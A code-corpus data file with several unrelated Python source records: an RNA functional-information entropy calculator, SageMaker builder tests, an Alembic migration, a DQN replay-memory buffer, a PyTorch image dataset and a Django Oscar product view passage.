height_class[aa_class] = (inverse_state_counts[aa_class] / sum(inverse_state_counts.values())) / (\n inverse_functions[aa_class] / sum(inverse_functions.values()))\n for aa_class in height_class:\n height_dict_inverse[singles][state][aa_class] = height_class[aa_class] / sum(height_class.values())\n\n return (info_inverse, height_dict_inverse)\n\n def calculate_entropy_inverse_NSB(self):\n \"\"\"\n Calculate functional information for anti-determinants using the NSB estimator.\n \"\"\"\n
info_inverse = defaultdict(lambda: defaultdict(float))\n height_dict_inverse = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n inverse_functions = Counter()\n for aa_class in self.functions:\n inverse_functions[aa_class] = sum(self.functions.values()) / self.functions[aa_class]\n\n np_inverse_functions = np.array(list(inverse_functions.values()))\n bg_entropy = -np.sum((np_inverse_functions[np_inverse_functions != 0] / np_inverse_functions[\n np_inverse_functions != 0].sum()) * np.log2(\n np_inverse_functions[np_inverse_functions != 0] / np_inverse_functions[np_inverse_functions != 0].sum()))\n for pairs in self.basepairs:\n for state in self.pairs:\n state_counts = self.get(pairs, state)\n if (sum(state_counts.values()) == 0):\n continue\n if (not len(state_counts) == len(self.functions)):\n for function in self.functions:\n state_counts[function] += 1\n\n inverse_state_counts = Counter()\n for aa_class in state_counts:\n inverse_state_counts[aa_class] = sum(state_counts.values()) / state_counts[aa_class]\n\n nsb_array = np.array(list(inverse_state_counts.values()))\n if (sum(state_counts.values()) <= len(self.inverse_exact)):\n expected_bg_entropy = self.inverse_exact[sum(state_counts.values()) - 1]\n fg_entropy = -np.sum((nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()) * np.log2(\n nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()))\n else:\n expected_bg_entropy = bg_entropy\n fg_entropy = nb.S(nb.make_nxkx(nsb_array, nsb_array.size), nsb_array.sum(), nsb_array.size)\n\n if (expected_bg_entropy - fg_entropy < 0):\n info_inverse[pairs][state] = 0\n else:\n info_inverse[pairs][state] = expected_bg_entropy - fg_entropy\n\n height_class = {}\n for aa_class in inverse_state_counts:\n height_class[aa_class] = (inverse_state_counts[aa_class] / sum(inverse_state_counts.values())) / (\n inverse_functions[aa_class] / sum(inverse_functions.values()))\n for aa_class in height_class:\n height_dict_inverse[pairs][state][aa_class] = height_class[aa_class] / sum(height_class.values())\n\n for singles in range(self.pos):\n for state in self.singles:\n state_counts = self.get([singles], state)\n if (sum(state_counts.values()) == 0):\n continue\n if (not len(state_counts) == len(self.functions)):\n for function in self.functions:\n state_counts[function] += 1\n\n inverse_state_counts = Counter()\n for aa_class in state_counts:\n inverse_state_counts[aa_class] = sum(state_counts.values()) / state_counts[aa_class]\n\n nsb_array = np.array(list(inverse_state_counts.values()))\n if (sum(state_counts.values()) <= len(self.inverse_exact)):\n expected_bg_entropy = self.inverse_exact[sum(state_counts.values()) - 1]\n fg_entropy = -np.sum((nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()) * np.log2(\n nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()))\n else:\n expected_bg_entropy = bg_entropy\n fg_entropy = nb.S(nb.make_nxkx(nsb_array, nsb_array.size), nsb_array.sum(), nsb_array.size)\n\n if (expected_bg_entropy - fg_entropy < 0):\n info_inverse[singles][state] = 0\n else:\n info_inverse[singles][state] = expected_bg_entropy - fg_entropy\n\n height_class = {}\n for aa_class in inverse_state_counts:\n height_class[aa_class] = (inverse_state_counts[aa_class] / sum(inverse_state_counts.values())) / (\n inverse_functions[aa_class] / sum(inverse_functions.values()))\n for aa_class in height_class:\n height_dict_inverse[singles][state][aa_class] = height_class[aa_class] / sum(height_class.values())\n\n return (info_inverse, height_dict_inverse)\n\n def 
calculate_prob_dist(self, types):\n\n kld_post_dist = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n kld_prior_dist = defaultdict(float)\n functions_array = np.array(list(self.functions.values()))\n # add-one (Laplace) smoothing over the union of function classes\n\n for p in types:\n if p not in self.functions:\n kld_prior_dist[p] = 1 / (functions_array[functions_array != 0].sum() + len(types))\n else:\n kld_prior_dist[p] = (self.functions[p] + 1) / (functions_array[functions_array != 0].sum() + len(types))\n\n for singles in range(self.pos):\n for state in self.singles:\n state_counts = self.get([singles], state)\n for t in types:\n if t not in state_counts:\n state_counts[t] = 1\n else:\n state_counts[t] += 1\n\n # function classes missing from state_counts were seeded with one above;\n # the set of classes is the union of function classes from both species\n for p in state_counts:\n kld_post_dist[singles][state][p] = state_counts[p] / sum(state_counts.values())\n\n return (kld_prior_dist, kld_post_dist)\n\n def calculate_kld(self, prior1, prior2, post1, post2):\n\n # 2 is foreground\n # 1 is background\n # function classes are taken from the background distribution\n\n # ratios will be saved here\n ratios = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n\n kld_prior = 0\n kld_dic = defaultdict(lambda: defaultdict(float))\n # the prior can never be zero because one was added to each function's frequency\n for p in prior1:\n kld_prior += prior2[p] * np.log2(prior2[p] / prior1[p])\n\n for singles in range(self.pos):\n for state in self.singles:\n for p in post1[singles][state]:\n kld_dic[singles][state] += post2[singles][state][p] * np.log2(\n post2[singles][state][p] / post1[singles][state][p])\n\n ratios[singles][state][p] = (post2[singles][state][p] / prior2[p]) / (\n post1[singles][state][p] / prior1[p])\n kld_dic[singles][state] -= kld_prior\n # clamp negative estimates to zero (temporary workaround)\n if kld_dic[singles][state] < 0:\n kld_dic[singles][state] = 0\n\n # calculate KLD heights\n kldheights = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n\n for single in range(self.pos):\n for state in self.singles:\n for p in post1[single][state]:\n kldheights[single][state][p] = kld_dic[single][state] * ratios[single][state][p] / sum(\n ratios[single][state].values())\n\n for single in range(self.pos):\n for state in self.singles:\n mysum = sum(kldheights[single][state].values())\n for p in kldheights[single][state]:\n if mysum != 0:\n kldheights[single][state][p] = kldheights[single][state][p] / mysum\n\n return kld_dic, kldheights\n\n def calculate_entropy_NSB(self):\n \"\"\"\n Calculate functional information using the NSB estimator.\n \"\"\"\n info = defaultdict(lambda: defaultdict(float))\n height_dict = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n\n functions_array = np.array(list(self.functions.values()))\n\n bg_entropy = -np.sum(\n (functions_array[functions_array != 0] / functions_array[functions_array != 0].sum()) * np.log2(\n functions_array[functions_array != 0] / functions_array[functions_array != 0].sum()))\n
for pairs in self.basepairs:\n for state in self.pairs:\n state_counts = self.get(pairs, state)\n if (sum(state_counts.values()) == 0):\n continue\n nsb_array = np.array(list(state_counts.values()) + [0] * (len(self.functions) - len(state_counts)))\n if (sum(state_counts.values()) <= len(self.exact)):\n expected_bg_entropy = self.exact[sum(state_counts.values()) - 1]\n fg_entropy = -np.sum((nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()) * np.log2(\n nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()))\n else:\n expected_bg_entropy = bg_entropy\n fg_entropy = nb.S(nb.make_nxkx(nsb_array, nsb_array.size), nsb_array.sum(), nsb_array.size)\n\n if (expected_bg_entropy - fg_entropy < 0):\n info[pairs][state] = 0\n else:\n info[pairs][state] = expected_bg_entropy - fg_entropy\n\n height_class = {}\n for aa_class in state_counts:\n height_class[aa_class] = (state_counts[aa_class] / sum(state_counts.values())) / (\n self.functions[aa_class] / len(self))\n for aa_class in height_class:\n height_dict[pairs][state][aa_class] = height_class[aa_class] / sum(height_class.values())\n\n for singles in range(self.pos):\n for state in self.singles:\n state_counts = self.get([singles], state)\n # print(state_counts,\"statecounts\")\n if (sum(state_counts.values()) == 0):\n continue\n nsb_array = np.array(list(state_counts.values()) + [0] * (len(self.functions) - len(state_counts)))\n # print(self.exact,\"self.exact\",len(self.exact))\n if (sum(state_counts.values()) <= len(self.exact)):\n expected_bg_entropy = self.exact[sum(state_counts.values()) - 1]\n fg_entropy = -np.sum((nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()) * np.log2(\n nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()))\n else:\n expected_bg_entropy = bg_entropy\n fg_entropy = nb.S(nb.make_nxkx(nsb_array, nsb_array.size), nsb_array.sum(), nsb_array.size)\n\n if (expected_bg_entropy - fg_entropy < 0):\n info[singles][state] = 0\n else:\n info[singles][state] = expected_bg_entropy - fg_entropy\n\n height_class = {}\n for aa_class in state_counts:\n height_class[aa_class] = (state_counts[aa_class] / sum(state_counts.values())) / (\n self.functions[aa_class] / len(self))\n\n for aa_class in height_class:\n height_dict[singles][state][aa_class] = height_class[aa_class] / sum(height_class.values())\n\n return (info, height_dict)\n\n def calculate_logoID_infos(self, info_1, info_2, pos, singles, pairs, basepairs):\n\n id_info12 = defaultdict(lambda: defaultdict(float))\n id_info21 = defaultdict(lambda: defaultdict(float))\n for k in range(pos):\n # id_info12[k] = {'A': 0, 'U': 0, 'G': 0, '-': 0, 'C': 0}\n # id_info21[k] = {'A': 0, 'U': 0, 'G': 0, '-': 0, 'C': 0}\n\n logo_1 = info_1[k]\n logo_2 = info_2[k]\n\n for c in singles:\n id_info21[k][c] = logo_2[c] - logo_1[c]\n if id_info21[k][c] < 0:\n id_info21[k][c] = 0\n\n id_info12[k][c] = logo_1[c] - logo_2[c]\n if id_info12[k][c] < 0:\n id_info12[k][c] = 0\n\n # print(k,\" : \",c,\" : \",id_info21[k][c],\"id_info21[k][c] singles\")\n # print()\n\n for k in basepairs:\n\n logo_1 = info_1[k]\n logo_2 = info_2[k]\n for c in pairs:\n\n id_info21[k][c] = logo_2[c] - logo_1[c]\n if id_info21[k][c] < 0:\n id_info21[k][c] = 0\n\n id_info12[k][c] = logo_1[c] - logo_2[c]\n if id_info12[k][c] < 0:\n id_info12[k][c] = 0\n # print(k, \" : \", c, \" : \", id_info21[k][c], \"id_info21[k][c] pairs\")\n # print()\n\n # # TODO: we might need to remove this:\n #\n # for k in range(pos):\n # for c in info_1[k]:\n # info_1[k][c] = id_info1[k][c]\n # info_2[k][c] = 
id_info2[k][c]\n\n return id_info12, id_info21 # info_1, info_2\n\n def calculate_logoID_heights(self, height_b, height_f, info, pos, singles, pairs, basepairs, type):\n # f - b\n id_height = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n # add zero to all the functions that do not exist\n\n for single in range(pos):\n for state in singles:\n for p in height_f[single][state]:\n if p in height_b[single][state] and height_b[single][state][p] != 0:\n id_height[single][state][p] = (height_f[single][state][p] /\n height_b[single][state][p])\n else:\n id_height[single][state][p] = height_f[single][state][p]\n # there is nothing for state -\n summ = sum(id_height[single][state].values())\n for p in id_height[single][state]:\n if summ != 0:\n id_height[single][state][p] = id_height[single][state][p] * info[single][state] / summ\n else:\n # print(single, state, \" sum is zero!!!!!!!!!!!!!\")\n id_height[single][state][p] = 0\n\n for single in basepairs:\n for state in pairs:\n for p in height_f[single][state]:\n if p in height_b[single][state] and height_b[single][state][p] != 0:\n id_height[single][state][p] = (height_f[single][state][p] /\n height_b[single][state][p])\n else:\n id_height[single][state][p] = height_f[single][state][p]\n # there is nothing for state -\n summ = sum(id_height[single][state].values())\n for p in id_height[single][state]:\n if summ != 0:\n id_height[single][state][p] = id_height[single][state][p] * info[single][state] / summ\n else:\n # print(single, state, \" sum is zero in pairs !!!!!!!!!!!!!\")\n id_height[single][state][p] = 0\n\n for single in range(pos):\n for state in singles:\n mysum = sum(id_height[single][state].values())\n for p in id_height[single][state]:\n if mysum != 0:\n id_height[single][state][p] = id_height[single][state][p] / mysum\n\n for single in basepairs:\n for state in pairs:\n mysum = sum(id_height[single][state].values())\n for p in id_height[single][state]:\n if mysum != 0:\n id_height[single][state][p] = id_height[single][state][p] / mysum\n\n for single in basepairs:\n for state in pairs:\n for t in type:\n if t not in id_height[single][state]:\n id_height[single][state][t] = 0\n\n for single in range(pos):\n for state in singles:\n for t in type:\n if t not in id_height[single][state]:\n id_height[single][state][t] = 0\n # for single in range(pos):\n # for state in singles:\n # print(single, \" : \",state, \" : \", id_height[single][state],\" id_height[single][state][p]\")\n # print()\n # for single in basepairs:\n # for state in pairs:\n # print(single, \" : \", state, \" : \", id_height[single][state], \" id_height[basepairs][state][p]\")\n # print()\n\n # id_height2 = {}\n # for single in range(pos):\n # id_height2[single] = {}\n # for state in singles:\n # id_height2[single][state] = {}\n # for p in id_height[single][state]:\n # if id_height[single][state][p] != 0:\n # id_height2[single][state][p] = id_height[single][state][p]\n # print(id_height2[single][state], \"**************id_height2[single][state]*************\")\n\n return id_height\n\n def is_overlap(self, position):\n pass\n\n def add_sequence(self, function, seq):\n self.sequences.append(Seq(function, seq))\n # print(Seq(function, seq),\"dddddddddddddddddddddd\")\n self.functions[function] += 1\n self.pos = len(seq) # pos is equal to 72\n self.singles.update(seq) # this contains A U C G - N\n\n for x in self.basepairs:\n self.pairs.add(seq[x[0]] + seq[x[1]])\n\n def get(self, position, state): # state is A U C G -\n ret_counter = Counter()\n\n if 
(len(position) == 1):\n for x in self.sequences:\n if (x.seq[position[0]] == state[0]):\n ret_counter[x.function] += 1\n if (len(position) == 2):\n for x in self.sequences:\n if (x.seq[position[0]] == state[0] and x.seq[position[1]] == state[1]):\n ret_counter[x.function] += 1\n return ret_counter\n\n def get_functions(self):\n function_list = []\n for key, val in self.functions.items():\n function_list.extend([key] * val)\n return function_list\n\n def __len__(self):\n return len(self.sequences)\n","sub_path":"tsfm/MolecularInformation.py","file_name":"MolecularInformation.py","file_ext":"py","file_size_in_byte":93459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
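The Miller-Maddow machinery in the record above reduces to a small amount of arithmetic per alignment column: a plug-in entropy over observed class counts, plus the first-order bias correction that approx_expect applies whenever the sample is too large for the precomputed exact tables. A minimal standalone sketch (the counts below are made up for illustration; only the formulas mirror the class):

import numpy as np

def plugin_entropy(counts):
    # maximum-likelihood ("plug-in") Shannon entropy in bits
    nz = counts[counts != 0]
    p = nz / nz.sum()
    return -np.sum(p * np.log2(p))

def expected_plugin_entropy(H, k, N):
    # first-order bias term, identical to approx_expect above:
    # E[H_plugin] ~= H - (k - 1) / (2 * N * ln 2), and log(4) == 2 * ln 2
    return H - (k - 1) / (np.log(4) * N)

background = np.array([40, 30, 20, 10])  # hypothetical function-class counts
column = np.array([9, 1])                # hypothetical counts at one position
info = (expected_plugin_entropy(plugin_entropy(background), background.size, column.sum())
        - plugin_entropy(column))
print(max(info, 0.0))  # negative estimates are clamped to zero, as in the class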
+{"seq_id":"426618051","text":"import pytest\nfrom sagemaker_groundtruth.sagemaker_groundtruth_internal import SageMakerGroundTruthInternal\n\n\ndef test_instance_return():\n instance = SageMakerGroundTruthInternal.get_builder()\n assert instance != None \n assert isinstance(instance, SageMakerGroundTruthInternal)\n\ndef test_exception_not_found_raises():\n instance = SageMakerGroundTruthInternal.get_builder()\n with pytest.raises(Exception) as excinfo: \n instance.build()\n assert str(excinfo.value) == \"Value for 'job_name' not found\"\n\n@pytest.fixture()\ndef instance_object():\n return SageMakerGroundTruthInternal.get_builder() \\\n .with_job_name(\"job_name\") \\\n .with_labeling_team(\"labeling_team\") \\\n .with_preprocessing_lambda(\"lambda\") \\\n .with_postprocessing_lambda(\"lambda\") \\\n .with_attribute_name(\"attr\") \\\n .with_input_manifest_path(\"path\") \\\n .with_output_manifest_path(\"path\") \\\n .with_labeling_template_path(\"path\") \\\n .with_task_time_limit(\"limit\") \\\n .with_job_availability_time(\"limit\")\n\ndef test_exception_tag_wrong_type_raises(instance_object):\n with pytest.raises(Exception) as excinfo: \n instance_object.with_tags({}).build()\n assert str(excinfo.value) == \"Value for 'tags' not found\" \n\ndef test_exception_tag_empty_list_raises(instance_object):\n with pytest.raises(Exception) as excinfo: \n instance_object.with_tags([]).build()\n assert str(excinfo.value) == \"Value for 'tags' not found\"\n \ndef test_exception_tag_missing_odin_app_id_raises(instance_object):\n with pytest.raises(Exception) as excinfo: \n instance_object.with_tags([{'Key':'fake_key','Value':'fake_value'}]).build()\n assert str(excinfo.value) == \"Key 'odin_app_id' not found\"\n \ndef test_exception_tag_missing_odin_app_id_raises(instance_object):\n instance = instance_object.with_tags([{'Key':'odin_app_id','Value':'odin_value'}]).build()\n assert instance != None \n assert isinstance(instance, SageMakerGroundTruthInternal)\n\n\ndef test_excpetion_if_properties_are_wrong_raises(instance_object):\n with pytest.raises(Exception) as excinfo: \n instance_object.with_tags([{'Key':'odin_app_id','Value':'odin_value'}]).build().create_job()\n\n\n# for debugging\nif __name__ == \"__main__\":\n pytest.main([\"tests/unit/test_sagemakergroundtruth.py\", \"-s\"])","sub_path":"tests/unit/test_sagemakergroundtruth.py","file_name":"test_sagemakergroundtruth.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"134452041","text":"\"\"\"delete avata column from user\n\nRevision ID: 8f2d439931c5\nRevises: 3b8b51eb2e59\nCreate Date: 2021-08-20 15:37:09.622730\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '8f2d439931c5'\ndown_revision = '3b8b51eb2e59'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('user', schema=None) as batch_op:\n batch_op.drop_column('avatar')\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('user', schema=None) as batch_op:\n batch_op.add_column(sa.Column('avatar', sa.BLOB(), nullable=True))\n\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/8f2d439931c5_delete_avata_column_from_user.py","file_name":"8f2d439931c5_delete_avata_column_from_user.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"420083118","text":"import numpy as np\nimport gym\nimport pdb\n\n# TODO: Add proper unittest\n\nclass Memory:\n \"\"\"Circular buffer for DQN memory reply.\"\"\"\n\n def __init__(self,\n max_len,\n batch_size,\n enable_pmr=False,\n initial_pmr_error=1000.0):\n \"\"\"\n Args:\n max_len: maximum capacity\n enable_pmr: if True, enable Marcins version of PMR\n initial_pmr_error: error for new samples, should be order of\n magnitude larger than max error during normal operation\n \"\"\"\n assert isinstance(max_len, int)\n assert max_len > 0\n\n self._max_len = max_len\n self._batch_size = batch_size\n self._enable_pmr = enable_pmr\n self._initial_pmr_error = initial_pmr_error\n\n self._curr_insert_ptr = 0\n self._curr_len = 0\n\n def set_state_action_spaces(self, state_space, action_space):\n \"\"\"Set state/action space descriptors\n Params:\n state_space: gym.spaces.Box (tested) or Discrete (not tested)\n action_space: gym.spaces.Box (not tested) or Discrete (tested)\n \"\"\"\n \n # These should be relaxed in the future to support more spaces,\n # possibly remove gym dependancy\n if not isinstance(state_space, gym.spaces.Box):\n raise ValueError('Only gym.spaces.Box state space supproted')\n if not isinstance(action_space, gym.spaces.Discrete):\n raise ValueError('Only gym.spaces.Discrete action space supported')\n\n assert state_space.shape is not None\n assert state_space.dtype is not None\n assert action_space.shape is not None\n assert action_space.shape is not None\n\n self._state_space = state_space\n self._action_space = action_space\n\n \n\n St_shape = [self._max_len] + list(state_space.shape)\n At_shape = [self._max_len] + list(action_space.shape)\n Rt_1_shape = [self._max_len]\n St_1_shape = [self._max_len] + list(state_space.shape)\n done_shape = [self._max_len]\n error_shape = [self._max_len]\n\n self._hist_St = np.zeros(St_shape, dtype=state_space.dtype)\n self._hist_At = np.zeros(At_shape, dtype=action_space.dtype)\n self._hist_Rt_1 = np.zeros(Rt_1_shape, dtype=float)\n self._hist_St_1 = np.zeros(St_1_shape, dtype=state_space.dtype)\n self._hist_done = np.zeros(done_shape, dtype=bool)\n self._hist_error = np.zeros(error_shape, dtype=float)\n\n self._log_every = None\n self._log_mem = None\n\n\n def append(self, St, At, Rt_1, St_1, done):\n \"\"\"Add one sample to memory, override oldest if max_len reached.\n\n Args:\n St - state\n At - action\n Rt_1 - reward\n St_1 - next state\n done - True if episode completed\n \"\"\"\n assert self._state_space is not None\n assert self._action_space is not None\n assert self._state_space.contains(St)\n assert self._action_space.contains(At)\n assert self._state_space.contains(St_1)\n\n self._hist_St[self._curr_insert_ptr] = St\n self._hist_At[self._curr_insert_ptr] = At\n self._hist_Rt_1[self._curr_insert_ptr] = Rt_1\n self._hist_St_1[self._curr_insert_ptr] = St_1\n self._hist_done[self._curr_insert_ptr] = done\n \n # arbitrary high def error\n self._hist_error[self._curr_insert_ptr] = self._initial_pmr_error\n\n #\n # increment insertion pointer, roll back if required \n #\n if self._curr_len < self._max_len:\n self._curr_len += 1\n\n self._curr_insert_ptr += 1 \n if self._curr_insert_ptr >= self._max_len:\n self._curr_insert_ptr = 0\n\n def _print_all(self):\n print()\n print('_hist_St')\n print(self._hist_St)\n\n print()\n print('_hist_At')\n print(self._hist_At)\n\n print()\n print('_hist_Rt_1')\n print(self._hist_Rt_1)\n\n print()\n print('_hist_St_1')\n print(self._hist_St_1)\n\n print()\n print('_hist_done')\n 
print(self._hist_done)\n\n def length(self):\n \"\"\"Number of samples in memory, 0 <= length <= max_len\"\"\"\n return self._curr_len\n\n def get_batch(self, batch_len=None):\n \"\"\"Sample a batch of data, with repetition.\n\n Args:\n batch_len: number of samples to pick,\n defaults to the value passed in the constructor\n\n Returns:\n states, actions, rewards, next_states, done, indices\n Each returned element is an np.ndarray with length == batch_len\n The last element 'indices' can be passed back to the update_errors() method\n \"\"\"\n assert self._state_space is not None\n assert self._action_space is not None\n assert self._curr_len > 0\n assert batch_len is None or batch_len > 0\n\n if batch_len is None:\n batch_len = self._batch_size\n\n if not self._enable_pmr:\n # np.random.randint is much faster than np.random.sample here\n indices = np.random.randint(\n low=0, high=self._curr_len, size=batch_len, dtype=int)\n\n else:\n # PMR: turn the error column into a CDF and sample proportionally to error\n cdf = np.cumsum(self._hist_error+0.01)\n cdf = cdf / cdf[-1]\n values = np.random.rand(batch_len)\n indices = np.searchsorted(cdf, values)\n\n\n states = np.take(self._hist_St, indices, axis=0)\n actions = np.take(self._hist_At, indices, axis=0)\n rewards_1 = np.take(self._hist_Rt_1, indices, axis=0)\n states_1 = np.take(self._hist_St_1, indices, axis=0)\n dones = np.take(self._hist_done, indices, axis=0)\n\n return states, actions, rewards_1, states_1, dones, indices\n\n def update_errors(self, indices, errors):\n \"\"\"For PMR, update error values for the specified indices.\n\n Example:\n memory = Memory(...)\n ... # add some data\n st, act, rew, st_1, done, indices = memory.get_batch(64)\n ... # train neural network\n ... # calculate error values for each element in batch\n ... # but do NOT modify memory in any way\n memory.update_errors(indices, np.abs(errors))\n \"\"\"\n assert self._state_space is not None\n assert self._action_space is not None\n assert isinstance(indices, np.ndarray)\n assert indices.ndim == 1\n assert len(indices) > 0\n assert isinstance(errors, np.ndarray)\n assert errors.ndim == 1\n assert len(indices) == len(errors)\n assert (errors > 0).all() # the () call is required; a bare .all is always truthy\n\n self._hist_error[indices] = errors\n\n def install_logger(self, logger, log_every):\n self._log_mem = logger\n self._log_every = log_every\n\n def log(self, episode, step, total_step):\n\n if self._log_mem is not None and not self._log_mem.is_initialized:\n self._log_mem.add_param('max_len', self._max_len)\n self._log_mem.add_param('enable_pmr', self._enable_pmr)\n self._log_mem.add_data_item('curr_size')\n self._log_mem.add_data_item('hist_St')\n self._log_mem.add_data_item('hist_At')\n self._log_mem.add_data_item('hist_Rt_1')\n self._log_mem.add_data_item('hist_St_1')\n self._log_mem.add_data_item('hist_done')\n self._log_mem.add_data_item('hist_error')\n\n #\n # Log Memory\n #\n if self._log_mem is not None and total_step % self._log_every == 0:\n\n ptr = self._curr_insert_ptr\n self._log_mem.append(\n episode, step, total_step,\n curr_size=self.length(),\n hist_St=np.concatenate((self._hist_St[ptr:], self._hist_St[0:ptr])),\n hist_At=np.concatenate((self._hist_At[ptr:], self._hist_At[0:ptr])),\n hist_Rt_1=np.concatenate((self._hist_Rt_1[ptr:], self._hist_Rt_1[0:ptr])),\n hist_St_1=np.concatenate((self._hist_St_1[ptr:], self._hist_St_1[0:ptr])),\n hist_done=np.concatenate((self._hist_done[ptr:], self._hist_done[0:ptr])),\n hist_error=np.concatenate((self._hist_error[ptr:], self._hist_error[0:ptr])) )\n \n\n\nif __name__ == '__main__':\n # smoke test, updated to match the current constructor and space API\n\n mem = Memory(max_len=10, batch_size=3)\n mem.set_state_action_spaces(\n gym.spaces.Box(low=-100.0, high=100.0, shape=(2,), dtype=float),\n 
gym.spaces.Discrete(20))\n\n i = 1\n mem.append(St=np.array([i, i], dtype=float),\n At=i, Rt_1=-i, St_1=np.array([i+1,i+1], dtype=float), done=False)\n res = mem.get_batch(3)\n print(res)\n\n i = 2\n mem.append(St=np.array([i, i], dtype=float),\n At=i, Rt_1=-i, St_1=np.array([i+1,i+1], dtype=float), done=False)\n res = mem.get_batch(3)\n print(res)\n\n i = 3\n mem.append(St=np.array([i, i], dtype=float),\n At=i, Rt_1=-i, St_1=np.array([i+1,i+1], dtype=float), done=False)\n res = mem.get_batch(3)\n print(res)\n\n\n for i in range(4, 12):\n mem.append(St=np.array([i, i], dtype=float),\n At=i, Rt_1=-i, St_1=np.array([i+1,i+1], dtype=float), done=False)\n\n i = 12\n mem.append(St=np.array([i, i], dtype=float),\n At=i, Rt_1=-i, St_1=np.array([i+1,i+1], dtype=float), done=True)\n res = mem.get_batch(3)\n print(res)\n","sub_path":"marcin/rl_agent/rl_agent/agents/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":9317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
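get_batch() switches between uniform sampling and the PMR path, which turns the per-sample error column into a CDF and samples from it. A hedged round-trip sketch using only the Memory API from the record (the error values fed back are stand-ins for real TD errors):

import numpy as np
import gym

mem = Memory(max_len=100, batch_size=4, enable_pmr=True)
mem.set_state_action_spaces(
    gym.spaces.Box(low=-1.0, high=1.0, shape=(2,), dtype=np.float32),
    gym.spaces.Discrete(3))

for i in range(20):
    st = np.zeros(2, dtype=np.float32)
    st_1 = np.full(2, 0.5, dtype=np.float32)
    mem.append(st, i % 3, -float(i), st_1, done=(i % 10 == 9))

states, actions, rewards, next_states, dones, idx = mem.get_batch()
# after a training step, write the absolute errors back so that high-error
# transitions get a proportionally larger slice of the sampling CDF
mem.update_errors(idx, np.abs(np.random.randn(len(idx))) + 1e-3)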
+{"seq_id":"155420265","text":"import os\nimport pickle\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision.transforms import Compose, RandomHorizontalFlip, RandomVerticalFlip\nfrom utils.helpers import Fix_RandomRotation\n\n\nclass vessel_dataset(Dataset):\n def __init__(self, path, mode, is_val=False, split=None):\n\n self.mode = mode\n self.is_val = is_val\n self.data_path = os.path.join(path, f\"{mode}_pro\")\n self.data_file = os.listdir(self.data_path)\n self.img_file = self._select_img(self.data_file)\n if split is not None and mode == \"training\":\n assert split > 0 and split < 1\n if not is_val:\n self.img_file = self.img_file[:int(split*len(self.img_file))]\n else:\n self.img_file = self.img_file[int(split*len(self.img_file)):]\n self.transforms = Compose([\n RandomHorizontalFlip(p=0.5),\n RandomVerticalFlip(p=0.5),\n Fix_RandomRotation(),\n ])\n\n def __getitem__(self, idx):\n img_file = self.img_file[idx]\n with open(file=os.path.join(self.data_path, img_file), mode='rb') as file:\n img = torch.from_numpy(pickle.load(file)).float()\n gt_file = \"gt\" + img_file[3:]\n with open(file=os.path.join(self.data_path, gt_file), mode='rb') as file:\n gt = torch.from_numpy(pickle.load(file)).float()\n\n if self.mode == \"training\" and not self.is_val:\n seed = torch.seed()\n torch.manual_seed(seed)\n img = self.transforms(img)\n torch.manual_seed(seed)\n gt = self.transforms(gt)\n\n return img, gt\n\n def _select_img(self, file_list):\n img_list = []\n for file in file_list:\n if file[:3] == \"img\":\n img_list.append(file)\n\n return img_list\n\n def __len__(self):\n return len(self.img_file)\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"408507511","text":"from django.contrib import messages\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.http import HttpResponseRedirect\n\nfrom oscar.apps.dashboard.catalogue.views \\\n import ProductCreateUpdateView as CoreProductCreateUpdateView\n\nfrom forms import ProductForm, ProductFragmentFormSet\n\nclass ProductCreateUpdateView(CoreProductCreateUpdateView):\n form_class = ProductForm\n fragment_formset = ProductFragmentFormSet\n\n def get_context_data(self, **kwargs):\n ctx = super(ProductCreateUpdateView, self).get_context_data(**kwargs)\n if 'fragment_formset' not in ctx:\n ctx['fragment_formset'] \\\n = self.fragment_formset(instance=self.object)\n return ctx\n\n\n\n def process_all_forms(self, form):\n \"\"\"\n Short-circuits the regular logic to have one place to have our\n logic to check all forms\n \"\"\"\n # Need to create the product here because the inline forms need it\n # can't use commit=False because ProductForm does not support it\n if self.creating and form.is_valid():\n self.object = form.save()\n\n stockrecord_formset = self.stockrecord_formset(\n self.product_class, self.request.user,\n self.request.POST, instance=self.object)\n category_formset = self.category_formset(\n self.request.POST, instance=self.object)\n fragment_formset = self.fragment_formset(\n self.request.POST, self.request.FILES, instance=self.object)\n image_formset = self.image_formset(\n self.request.POST, self.request.FILES, instance=self.object)\n recommended_formset = self.recommendations_formset(\n self.request.POST, self.request.FILES, instance=self.object)\n\n is_valid = all([\n form.is_valid(),\n category_formset.is_valid(),\n fragment_formset.is_valid(),\n image_formset.is_valid(),\n recommended_formset.is_valid(),\n stockrecord_formset.is_valid(),\n ])\n\n if is_valid:\n return self.forms_valid(\n form, stockrecord_formset, category_formset,\n fragment_formset, image_formset, recommended_formset)\n else:\n # delete the temporary product again\n if 